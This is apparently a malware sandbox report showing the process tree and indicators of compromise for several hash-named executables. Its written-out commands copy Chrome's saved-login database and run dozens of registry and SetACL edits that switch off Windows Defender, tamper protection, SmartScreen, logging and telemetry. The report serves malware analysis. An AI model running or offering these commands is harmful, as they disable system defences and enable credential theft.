3108	Explorer.EXE
3108	Explorer.EXE
2132	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4024 wrote to memory of 4276	4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	116
PID 4024 wrote to memory of 4276	4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	116
PID 4024 wrote to memory of 4276	4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	116
PID 4276 wrote to memory of 1708	4276	jazvc.exe	118
PID 4276 wrote to memory of 1708	4276	jazvc.exe	118
PID 4276 wrote to memory of 1708	4276	jazvc.exe	118
PID 4276 wrote to memory of 1708	4276	jazvc.exe	118
PID 3108 wrote to memory of 4640	3108	Explorer.EXE	119
PID 3108 wrote to memory of 4640	3108	Explorer.EXE	119
PID 3108 wrote to memory of 4640	3108	Explorer.EXE	119
PID 4640 wrote to memory of 2408	4640	help.exe	120
PID 4640 wrote to memory of 2408	4640	help.exe	120
PID 4640 wrote to memory of 2408	4640	help.exe	120
PID 3108 wrote to memory of 4920	3108	Explorer.EXE	122
PID 3108 wrote to memory of 4920	3108	Explorer.EXE	122
PID 3108 wrote to memory of 4920	3108	Explorer.EXE	122
PID 4920 wrote to memory of 656	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	123
PID 4920 wrote to memory of 656	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	123
PID 4920 wrote to memory of 656	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	123
PID 656 wrote to memory of 2620	656	IBInstaller_98220.exe	124
PID 656 wrote to memory of 2620	656	IBInstaller_98220.exe	124
PID 656 wrote to memory of 2620	656	IBInstaller_98220.exe	124
PID 4920 wrote to memory of 1664	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	125
PID 4920 wrote to memory of 1664	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	125
PID 4920 wrote to memory of 1664	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	125
PID 1664 wrote to memory of 4748	1664	setup.exe	126
PID 1664 wrote to memory of 4748	1664	setup.exe	126
PID 1664 wrote to memory of 4748	1664	setup.exe	126
PID 3108 wrote to memory of 4088	3108	Explorer.EXE	180
PID 3108 wrote to memory of 4088	3108	Explorer.EXE	180
PID 3108 wrote to memory of 4088	3108	Explorer.EXE	180
PID 4748 wrote to memory of 184	4748	cmd.exe	228
PID 4748 wrote to memory of 184	4748	cmd.exe	228
PID 4748 wrote to memory of 184	4748	cmd.exe	228
PID 4748 wrote to memory of 3956	4748	cmd.exe	271
PID 4748 wrote to memory of 3956	4748	cmd.exe	271
PID 4748 wrote to memory of 3956	4748	cmd.exe	271
PID 4748 wrote to memory of 4824	4748	cmd.exe	133
PID 4748 wrote to memory of 4824	4748	cmd.exe	133
PID 4748 wrote to memory of 4824	4748	cmd.exe	133
PID 4748 wrote to memory of 1796	4748	cmd.exe	135
PID 4748 wrote to memory of 1796	4748	cmd.exe	135
PID 4748 wrote to memory of 1796	4748	cmd.exe	135
PID 4748 wrote to memory of 3760	4748	cmd.exe	136
PID 4748 wrote to memory of 3760	4748	cmd.exe	136
PID 4748 wrote to memory of 3760	4748	cmd.exe	136
PID 4748 wrote to memory of 3000	4748	cmd.exe	224
PID 4748 wrote to memory of 3000	4748	cmd.exe	224
PID 4748 wrote to memory of 3000	4748	cmd.exe	224
PID 4748 wrote to memory of 4932	4748	cmd.exe	174
PID 4748 wrote to memory of 4932	4748	cmd.exe	174
PID 4748 wrote to memory of 4932	4748	cmd.exe	174
PID 4748 wrote to memory of 2920	4748	cmd.exe	195
PID 4748 wrote to memory of 2920	4748	cmd.exe	195
PID 4748 wrote to memory of 2920	4748	cmd.exe	195
PID 4748 wrote to memory of 4260	4748	cmd.exe	303
PID 4748 wrote to memory of 4260	4748	cmd.exe	303
PID 4748 wrote to memory of 4260	4748	cmd.exe	303
PID 4748 wrote to memory of 5020	4748	cmd.exe	300
PID 4748 wrote to memory of 5020	4748	cmd.exe	300
PID 4748 wrote to memory of 5020	4748	cmd.exe	300
PID 4748 wrote to memory of 4448	4748	cmd.exe	142
PID 4748 wrote to memory of 4448	4748	cmd.exe	142
PID 4748 wrote to memory of 4448	4748	cmd.exe	142

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2022-10-24.zip
1⤵
PID:3620

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3108
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2022-10-24\" -spe -an -ai#7zMap25196:78:7zEvent21347
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4540
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2022-10-24\" -spe -an -ai#7zMap27125:78:7zEvent26685
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:572
- C:\Users\Admin\Desktop\2022-10-24\0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe
  "C:\Users\Admin\Desktop\2022-10-24\0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4052
- C:\Users\Admin\Desktop\2022-10-24\0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe
  "C:\Users\Admin\Desktop\2022-10-24\0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe
  "C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4024
- - C:\Users\Admin\AppData\Local\Temp\jazvc.exe
    "C:\Users\Admin\AppData\Local\Temp\jazvc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:4276
  - - C:\Users\Admin\AppData\Local\Temp\jazvc.exe
      "C:\Users\Admin\AppData\Local\Temp\jazvc.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:1708
- C:\Windows\SysWOW64\help.exe
  "C:\Windows\SysWOW64\help.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\jazvc.exe"
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
    3⤵
    PID:9468
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:6480
- C:\Users\Admin\Desktop\2022-10-24\0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
  "C:\Users\Admin\Desktop\2022-10-24\0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\IBInstaller_98220.exe
    "C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\IBInstaller_98220.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs98220 -token mtn1co3fo4gs5vwq -subid 1878
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:656
  - - C:\Users\Admin\AppData\Local\Temp\is-CJ2F1.tmp\IBInstaller_98220.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-CJ2F1.tmp\IBInstaller_98220.tmp" /SL5="$80320,9912121,832512,C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\IBInstaller_98220.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs98220 -token mtn1co3fo4gs5vwq -subid 1878
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:2620
- - C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe" 991878
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1664
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\do32.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        
        PID:184
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4824
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1796
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3760
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:3000
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
        5⤵
        
        PID:4932
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
        
        SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:5020
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
        5⤵
        
        PID:4448
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1168
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:2716
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:3688
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:4048
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3600
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:684
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1424
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4356
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4304
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
        5⤵
        
        PID:2948
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4200
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
        5⤵
        
        PID:368
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:572
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:436
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1660
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4596
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4312
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3888
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
        5⤵
        
        PID:4232
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:4736
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:2508
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:5016
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1608
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:2736
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:3856
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:2388
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3324
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2252
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3628
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4932
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:5044
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4248
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3792
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
        5⤵
        
        PID:3560
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3092
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
        5⤵
        Executes dropped EXE
        
        PID:4088
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:5096
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:3404
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1892
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
        5⤵
        
        PID:3336
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:3116
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1284
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:3120
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4580
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2416
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
        5⤵
        
        PID:4132
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2920
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4332
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2168
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4228
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:4544
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:1792
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
        5⤵
        
        PID:1084
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2996
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1616
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:3096
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
        5⤵
        
        PID:3104
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
        5⤵
        
        PID:1200
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:232
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4564
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
        5⤵
        Modifies Windows Defender notification settings
        
        PID:4516
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
        5⤵
        
        PID:2492
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2020
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:1828
        
